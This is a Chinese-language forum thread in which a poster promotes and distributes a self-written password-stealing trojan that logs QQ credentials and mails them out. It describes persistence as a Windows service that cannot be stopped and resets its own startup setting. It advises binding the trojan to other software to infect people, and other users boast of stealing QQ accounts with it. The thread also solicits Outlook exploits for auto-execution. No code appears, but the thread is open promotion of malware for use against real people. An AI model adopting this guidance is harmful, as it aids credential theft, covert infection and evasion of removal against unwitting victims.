20CN网络安全小组第一代论坛: 一个超级密码记录木马

»	20CN网络安全小组第一代论坛 » 安全基地 » 菜鸟乐园 » 一个超级密码记录木马

作者

标题: 一个超级密码记录木马

47090005
未注册

发表于

该木马是用来监听各种密码的，如QQ号和密码，有自动发信功能，和top差不多，它的特点是把自己加到windows nt服务中，非常具有隐蔽性，如果在创建服务时不提供停止和删除功能，你即使知道种了木马也没有办法删除它，是不是很厉害？有兴趣的朋友可以到 null[URL=http://" TARGET=_blank>http://yyt_hac.home.chinaren.com去下载测试版，多提些建议和看法，让我们共同来完善它！！！null[URL=http:// yyt_hac.home.chinaren.com]http://yyt_hac.home.chinaren.com[/URL]

IP: 已记录

没影
未注册

发表于

我已经发出几个了，就等着看结果了……

IP: 已记录

罗马剑客
未注册

发表于

password sniffer?

IP: 已记录

yyt_hac
未注册

发表于

试用得怎么样，难道就没人提点建议吗？

IP: 已记录

呵呵我真坏
未注册

发表于

都不能用呀，我的系统是WIN98，没意思
有没有WIN9X用的呀
介绍介绍

IP: 已记录

没影
未注册

发表于

我就说一个字……爽！我用它已经偷了几个qq号码了！！！

有一点小问题，就是发回邮件的内容有点乱，有些没用的也发回来了，还有就是对于一些肉鸡本地操作的记录不是很全！
我的qq是113509，你和我联系吧！

IP: 已记录

yyt_hac
未注册

发表于

好，我现在正在改进，要是有人提供一些利用outlook漏洞自动执行程序的资料就好了。window 9x版本的已经出来了，需要的可以到我主页上去下载^_^

IP: 已记录

yyt_hac
未注册

发表于

经过今天的奋战，NT下的超级密码记录木马1.0正式版终于完成了，只有一个可执行文件，只要用捆绑工具把它和别的软件绑在一起寄给别人，只要运行，木马就会被复制到系统目录下，并且把自己添加到服务中，你就等着收信吧，Q Q号如同滔滔江水连绵不绝。。。，赶快到我的主页去下载吧

IP: 已记录

yyt_hac
未注册

发表于

昨天晚上一想，发现1.0中有两比较大的缺陷，希望不太迟，
1.1版本所作的改进：
1、在1.0中，木马运行后只是安装了服务，并没有运行服务，所以这时给人发现是很容易被删除的，1.1安装并且启动服务，这个服务启动后就没法停止，这个缺陷没有了。
2、在1.0中，如果木马被发现，可以通过把服务的启动方式改为手动或禁止，然后重起计算机，木马就没作用了。而在1.1中，木马会监视自己的启动方式，只要被改掉，它会把它改回来，因此即使被发现，也很难删除。
1.1版本出来后，虽然叫超级木马，其实是虚有其名，我的目标是在2.0中，实现真正的超级木马，那时这个木马将更加强大和隐蔽。不过推出的时间可能要长一些，大家先将就用一下1 .1吧。
如果有高手给我一些技术和建议，我是非常感激的。

IP: 已记录

没影
未注册